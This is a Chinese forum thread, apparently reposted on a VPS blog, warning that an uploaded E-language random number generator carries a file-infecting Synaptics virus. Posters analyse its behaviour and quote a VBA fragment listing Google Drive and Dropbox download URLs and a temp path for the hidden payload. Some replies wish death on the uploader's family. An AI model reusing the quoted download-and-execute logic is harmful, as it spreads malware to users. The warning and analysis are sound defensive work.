美国VPS_搬瓦工CN2 GIA VPS
/forum.php?mod=redirect&goto=findpost&ptid=606638&pid=7358478
这里q952417961上传了他自己编写的易语言版本的随机数生成器,其中含有病毒。我不确定这是他故意加上的还是他自己的电脑也中毒。
请注意我并没有在讨论易语言写的程序会不会被报毒!那可能只是某些杀毒软件的误报之类的。他的文件是感染exe和office系列文件的,这不是任何一个正常程序应该出现的!
证据如下:
文件不正常的显示为Synaptics公司出名,并且为压缩包。
在沙盘启动后会启动隐藏进程Synaptics.exe,并且解压出真正的._cache.XXXX.exe的真实文件。
Synaptics.exe随即感染桌面和我的文档中所有exe,将其变为压缩包形式。运行这些程序将释放出同样的病毒文件。
病毒为delphi编写。exe程序会全盘扫描并感染所有office和exe文件!
病毒压缩包打开后因为openxml的形式,推测实质为宏病毒。
已确定该文件为宏病毒。病毒本体在附件中(txt格式很安全,大佬可以分析下)
附件2为病毒exe本体,请不要执行(或在沙盒中执行!)
内蒙古网友:易语言的,正常啊
河南网友:只?感?染?翻?墙?电?脑?,?这?病?毒?是?方?校?长?搞?出?来?的?吗??
香港网友: URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
TMP = Environ("Temp") & "\~$cache1.exe"
江西网友:他这个绝对有毒。
另外发现有个有趣的事情。这个病毒生成的宏病毒文件对普通用户是没有杀伤力的,因为他的感染文件是从dropbox和google drive下载的,普通用户根本连不上……
北京网友:楼上一堆人是没仔细读么,楼主说的是已经感染成exe了。都在说报毒!
北京网友:这种人应该死 全家
内蒙古网友:不懂装懂的说易语言报毒的人真可怕
广东网友:人家都说感染其他文件了,还有沙雕再说易语言报毒正常,这玩意是报毒吗
台湾网友:易语言写个随机数 就 1M多 肯定不正常啊. 一般 生成upx 下也就 300k, 先封号再说
天津网友:病毒vba脚本已上传,懂vba的大佬可以瞅瞅
香港网友:前排刘明,此贴必火
重庆网友:前排沙发
江苏网友:易语言写个HELLO WORLD 都会报毒
西藏网友:不懂,但是易语言很多程序都被报毒。
江西网友:毕竟灰黑产病毒语言,正常啊
甘肃网友:
哇 不会吧 我以为MJJ都亲切善良热心
经常下载MJJ推荐的风格包。有后门怎么办。
西藏网友:前排围观。。要火
台湾网友:卡巴斯基就能扫,一般易语言卡巴斯基不会报毒,报毒的易语言软件肯定是有毒的
河北网友:卡巴斯基就能扫,一般易语言卡巴斯基不会报毒,报毒的易语言软件肯定是有毒的
山东网友:没用过
湖南网友:病毒vba脚本已上传,懂vba的大佬可以瞅瞅
吉林网友:用 火绒,或者卡巴杀,没提示就没毒了,易语言 有些支持库是delphi写的。。。
香港网友:可能是他的易语言破解版被修改过了
当然也不排除本人加马
宁夏网友:易语言经常报毒,所以大家都习以为常,所以更容易通过易语言传毒
香港网友:他这个绝对有毒。
另外发现有个有趣的事情。这个病毒生成的宏病毒文件对普通用户是没有杀伤力的,因为他的感染文件是从dropbox和google drive下载的,普通用户根本连不上……
四川网友:易语言写个随机数 就 1M多 肯定不正常啊. 一般 生成upx 下也就 300k, 先封号再说
内蒙古网友:前排围观。。。紫薯补丁
河南网友:楼上一堆人是没仔细读么,楼主说的是已经感染成exe了。都在说报毒!
贵州网友:楼上一堆人是没仔细读么,楼主说的是已经感染成exe了。都在说报毒!
青海网友: URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
TMP = Environ("Temp") & "\~$cache1.exe"
海南网友:这些链接已经全部404了。
重庆网友:看到这么多人一听易语言就说报病毒正常也是醉了
云南网友:围观一下
江苏网友:打开工作表,执行 写入注册表,关闭VBA安全提示。
然后通过URL(1),URL(2),URL(3) 下载文件,并隐藏执行。
三个连接都已经失效。
大佬不妨把那个exe发出来,在沙盒目录的:
C:\ProgramData\Synaptics\Synaptics.exe
C:\windows\\System32\Synaptics\Synaptics.exe
这两个地方。
河南网友:已经上传到顶楼
河北网友:只?感?染?翻?墙?电?脑?,?这?病?毒?是?方?校?长?搞?出?来?的?吗??
北京网友:除了误报,一般确认有毒的都是故意放的,不存在无意。
新疆网友:这种软件还要求嘛,c#随手画一个。。
广西网友:这种软件还要求嘛,c#随手画一个。。
西藏网友:用心险恶
山东网友:技术大佬给跪了
上海网友:人家都说感染其他文件了,还有沙雕再说易语言报毒正常,这玩意是报毒吗
黑龙江网友:对的 昨天我下载完解压火绒就报毒删了 我一开始也以为是易语言的问题就没在意 用的是另一个大佬写的那个
河北网友:mark
四川网友:留名,想要这种小程序一般都是自己写的,但还是感谢楼主指出来!!
贵州网友:我当时打开运行了一下就发现 有捆绑释放 然后我就火绒杀毒了
陕西网友:这种人应该死 全家
四川网友:没找到原贴,,,为啥要易语言版的随机数生成器,,,,表示PHP一把梭
山东网友:没找到原贴,,,为啥要易语言版的随机数生成器,,,,表示PHP一把梭
海南网友:那就是我写的…………
广东网友:不懂装懂的说易语言报毒的人真可怕
广西网友:后排围观,还好没有下载。
台湾网友:
我也中过这个毒:https://www.52pojie.cn/thread-1039848-1-1.html
看下这病毒的分析:www删掉.cnblogs.com/Gj-Dreamer/p/11353230.html
注意:这软件只感染E语言程序。
开隐藏,看C:\ProgramData\Synaptics,有没有Synaptics.exe
目前实测,火绒能杀,并且能还原源文件。。。
山东网友:这个程序感染所有exe,连安装程序都感染
台湾网友:针对扶墙用户专门搞的吗
安徽网友:麻烦,bash下面就有自带变量
澳门网友:http://www.myzhenai.com.cn/post/2903.html
shell下有常量可以实现,php也有函数实现。可以了解一下。
陕西网友:一个随机数而已,自己百度弄个网页版的就行了吧,
咋还下载易语言的执行文件了。
这得多懒
湖南网友:一个随机数而已,自己百度弄个网页版的就行了吧,
咋还下载易语言的执行文件了。
这得多懒
香港网友:大佬分析工具能不能pm一份。
云南网友:sandboxie 已经免费了。
未经允许不得转载:美国VPS_搬瓦工CN2 GIA VPS » 论坛有人传病毒,请大家注意
腾讯云轻量怎么购买,云轻量香港/美国/新加坡购买教程
亏了,刚才退款了一个greencloud日本
10欧的IPMI写什么申请理由好?
